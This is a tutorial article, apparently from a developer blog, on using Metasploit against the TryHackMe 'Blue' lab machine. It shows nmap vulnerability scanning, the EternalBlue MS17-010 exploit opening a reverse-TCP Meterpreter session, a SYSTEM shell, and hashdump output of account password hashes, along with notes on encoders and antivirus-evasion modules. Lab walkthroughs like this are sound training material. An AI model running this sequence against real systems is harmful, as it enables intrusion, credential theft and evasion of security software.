Metasploit, a tool for penetration testing and cracking the security of ICT systems, is one of the most well-known open source projects in the security world. In this article, we will take a look at how to navigate its interface and use its main functionalities.
The first launch
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
msf6 >
The first time we run it, we get information about the available number of exploits, auxiliaries and other scripts. What exactly are they?
- Exploits - these are modules which use payload. When working with msf we will use them most often,
- auxiliary - a module that takes into account all available scanners, fuzzers, sniffers, etc.,
- post - a module used for post exploitation of the machine,
- payloads - scripts used to interact with the hacked system. There are three types of payloads - singles, staged and stages. They differ in their level of sophistication,
- encoders - in the case of penetration testing, our attempted attacks can be detected by security software. This can lead to the attacker wasting his time. To avoid this, encoders are used. Their task is to hide the exploit in such a way that it ib undetected,
- nops - these are No Operation instructions, which simply move the execution of the program to the next memory address. We use nops to reach the desired location in memory addresses,
- evasion - a module used to create payloads that bypass antivirus software.
Metasploit in practice
To better be able to focus on explaining the entire process of working with metasploit, all the commands used in the example can be found at the end of the article in the "cheatsheet" section.
The machine we will be attacking is the blue machine available on tryhackme. We start by running it and scanning all available ports, and then run the vulnerability scanner. We could use one of the available auxiliary modules to check the ports, but undoubtedly the best tool for this would be nmap - no need to complicate your life unnecessarily. If you don't already know how it works, we recently inserted an extensive article about it.
┌──(figaro㉿kali)-[~]
└─$ nmap --script vuln 10.10.160.42
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 15:15 EST
Nmap scan report for 10.10.160.42
Host is up (0.062s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 97.72 seconds
This way we get information about potential vulnerabilities of the attacked machine. So let's try to find one of them in the metasploit database.
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Next, we will use the auxiliary scanner (auxiliary) and display its options to see what we get in the results.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordl yes List of named pipes to check
ists/named_pipes.txt
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
sing-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
As you can see, you need to specify the RHOSTS variable before proceeding - let's do that, and then run the scanner.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.160.42
rhosts => 10.10.160.42
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 10.10.160.42:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.160.42:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Metasploit has confirmed that the host is vulnerable to the ms17-010 EternalBlue exploit. The next thing we will try to accomplish is to run the targeted exploit to compromise the machine. Before that, we again need to pinpoint the attacked RHOST.
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
mmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.160.42
RHOSTS => 10.10.160.42
In addition, if you are using a VPN, you will need to set the LHOST variable.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.6.223
LHOST => 10.9.6.223
Now it remains for us to run the exploit with the run
or exploit
command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.9.6.223:4444
[*] 10.10.21.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.21.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.21.28:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.21.28:445 - The target is vulnerable.
[*] 10.10.21.28:445 - Connecting to target for exploitation.
[+] 10.10.21.28:445 - Connection established for exploitation.
[+] 10.10.21.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.21.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.21.28:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.21.28:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.21.28:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.21.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.21.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.21.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.21.28:445 - Starting non-paged pool grooming
[+] 10.10.21.28:445 - Sending SMBv2 buffers
[+] 10.10.21.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.21.28:445 - Sending final SMBv2 buffers.
[*] 10.10.21.28:445 - Sending last fragment of exploit packet!
[*] 10.10.21.28:445 - Receiving response from exploit packet
[+] 10.10.21.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.21.28:445 - Sending egg to corrupted connection.
[*] 10.10.21.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.21.28
[*] Meterpreter session 9 opened (10.9.6.223:4444 -> 10.10.21.28:49169) at 2021-11-23 18:56:55 -0500
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
As you can see, we are in the meterpreter shell by default. What is it? It is one of the payloads of the metasploit attack, which ultimately allows us to explore the machine without leaving any traces. So let's try changing the shell from meterpreter to shell. First, re-enter metasploit with the background
command - this does not kill the active session. Their full list can be viewed with the sessions
command.
meterpreter > background
[*] Backgrounding session 9...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
9 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.9.6.223:4444 -> 10.10.21.28:49169 (10.10.21.28)
To use shell instead of meterpreter, we can use one of the post module scripts - shell_to_meterpreter.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
In order for the script to work properly, we need to complete the SESSION variable. From the previous command, we know that the id of the session we are interested in is equal to 9.
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 9
SESSION => 9
What remains is to run the module. Or, instead of using the post module, we can simply type the shell
command in the meterpreter.
meterpreter > shell
Process 2064 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
We can see that we have escalated to NT authority, which is the local system account. This gives us unlimited access to all local system resources.
The next challenge is to find a non-default user and crack his password. To list all users with their passwords, we will use the hashdump
command.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Now it remains to crack the password using, for example, the John the ripper tool and to find hidden flags in system files - we will not go through this step by step, as this is not the intention of the current article.
Cheatsheet
-
search <regex>
- search for a module by the indicated regex, -
use exploit/<exploitPath>
- indicate the exploit we will want to use, -
set <payload>
- set the payload, -
options
- display options for the currently used module, -
set <option> <value>
- set the value for the selected option, -
exploit / run
- run the previously selected exploit / module.
Sources
https://www.metasploit.com/
https://www.offensive-security.com/metasploit-unleashed/
https://www.tutorialspoint.com/metasploit/metasploit_payload.html
https://github.com/security-cheatsheet/metasploit-cheat-sheet
https://tryhackme.com/room/blue
https://github.com/openwall/john
Top comments (0)